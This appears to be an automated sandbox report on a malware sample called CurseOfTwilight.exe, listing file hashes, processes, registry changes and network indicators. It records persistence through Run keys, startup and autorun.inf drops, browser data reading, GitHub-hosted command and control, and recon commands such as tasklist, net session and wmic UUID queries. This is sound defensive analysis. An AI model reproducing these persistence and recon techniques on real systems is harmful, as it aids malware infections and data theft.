| SHA256 | c43568600a4203ac8dc7bbe0d75cfffef2659398ff1f02b4587803273b9cf6f2 |
| SHA512 | f90f7c6c78a4a165f1b3b86cef8878397526868521fe8b3303af2f174a6403d61b07d866fc662a5a3831a563669e6167fa76ed84f59e8c4cbd61b3fdfb0da139 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\hcue34dg.default-release\cache2\entries\E66F5AA5E3C285C270CF84BD11111C74D38F245C
| MD5 | c91f5a12dbd6b444d1f1f5fd1af0b3ba |
| SHA1 | 61f25c12694294a9ca7179b2effa9fefd020f23c |
| SHA256 | fa0d84da39e7ce3d6e22af65c6aa4b307ec4c508386fa3488293ff6f33664223 |
| SHA512 | eadca075ca6956d5ca80e64f701494babdd38193c0c3483a5e265bc098fa24df3aa2c030178e11308a26eafacd6e6e281b39e5d57e2a58401d22f7d3f7180a01 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\prefs-1.js
| MD5 | db81a6ab86f36895a86e1aca19605b73 |
| SHA1 | b51f2f3e8b18040b26f9200e3fb0e538ca9e0b46 |
| SHA256 | fba8b2f2e5f52c7154529fe5a074b15b49779951ff5f86454b1ea337fecb5b5f |
| SHA512 | f95ede8a1c23e832207ab3c9332192bc222abb3b9055cd310fa98d22799e4f1cd909731c2956f6333b27ef907d8d442cb26906e0595a781c85b8fea5db6484ea |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\prefs-1.js
| MD5 | 20197a55ecc6710a2bcccc7c9b5b7470 |
| SHA1 | c5886b56744a15242379fa19aeb0cd4b7c54390b |
| SHA256 | d284dc0b9219e336f2f51fea3b175df10725e4feff7ccc57727dcb87002960f9 |
| SHA512 | cedf4b52e203f39d78061cf15e1eb5594ab46f25ac3308320565e3caa4cdeab8ac707fafb614f79e266c6ef19849ebf9bb21a6c9139fc810d41410f62ed5551d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | de36f74e1aac06a957d5dde63b4533bc |
| SHA1 | 0ca4884ec1a5cc9cfcfb97495dd25e9e9743b0ab |
| SHA256 | 200f44033094d3243d842c7e03c861e90f66fb402f95fcae6e7a0b6b735311c5 |
| SHA512 | 65fe16e81a3c453244d9e5f32fc147d165852cbb708f301e983fd9807e598c98212c3d3d7e37be39e4f9c278a706e7be7d1940f91294b3cfc64099a4f274f032 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
57s
Max time network
77s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
131s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
151s
Max time network
173s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseOfTwilight.exe | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupP0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CurseOfTwilight.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_P0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_P0HaCU.vbs" | C:\Windows\system32\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe
"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2148 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4840 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\tasklist.exe
tasklist
